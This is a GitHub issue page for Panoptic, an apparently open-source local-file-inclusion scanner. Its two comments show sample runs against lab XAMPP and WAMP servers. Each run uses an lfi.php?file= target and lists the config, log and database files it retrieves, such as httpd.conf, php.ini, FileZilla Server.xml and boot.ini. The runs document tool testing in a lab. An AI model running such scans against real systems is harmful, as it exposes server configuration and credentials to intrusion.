Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Check tool against non-LAMP platforms #4

Open
stamparm opened this issue Apr 12, 2013 · 2 comments
Open

Check tool against non-LAMP platforms #4

stamparm opened this issue Apr 12, 2013 · 2 comments
Milestone

Comments

@stamparm
Copy link
Collaborator

No description provided.

@stamparm
Copy link
Collaborator Author

Sample run against XAMPP:

python panoptic.py -u "http://192.168.21.129/test_environment/mysql/lfi.php?file=1" --ignore-proxy

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1-d038179 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 16:22:32

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: Windows
[?] Do you want to restrict further scans to 'Windows'? [Y/n] 
[+] Found '/xampp/apache/logs/access.log' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/apache/logs/error.log' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/mysql/data/mysql.err' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/apache/conf/httpd.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/FileZillaFTP/FileZilla Server.xml' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/MercuryMail/mercury.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/sendmail/sendmail.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/webalizer/webalizer.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/boot.ini' (Windows/Win NT/conf)

[i] File search complete.

[i] Finishing scan at: 16:22:36

@lightos
Copy link
Owner

lightos commented Apr 22, 2013

Sample run against WAMP:

root@bt:~/Panoptic# python panoptic.py -u "http://192.168.1.202/lfi.php?file=x" --software WAMP

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1-edda686 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 20:20:35

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: Windows
[?] Do you want to restrict further scans to 'Windows'? [Y/n] 
[+] Found '/wamp/logs/access.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/apache_error.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/genquery.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/mysql.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/slowquery.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.000096' (Windows/Databases/log)
[+] Found '/wamp/bin/apache/apache2.2.21/conf/httpd.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/wamp/bin/mysql/mysql5.5.16/my.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/wamp/bin/php/php5.3.8/php.ini' (Windows/Packaged Web Dev/conf)

[i] File search complete.

[i] Finishing scan at: 20:20:37

root@bt:~/Panoptic# 

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants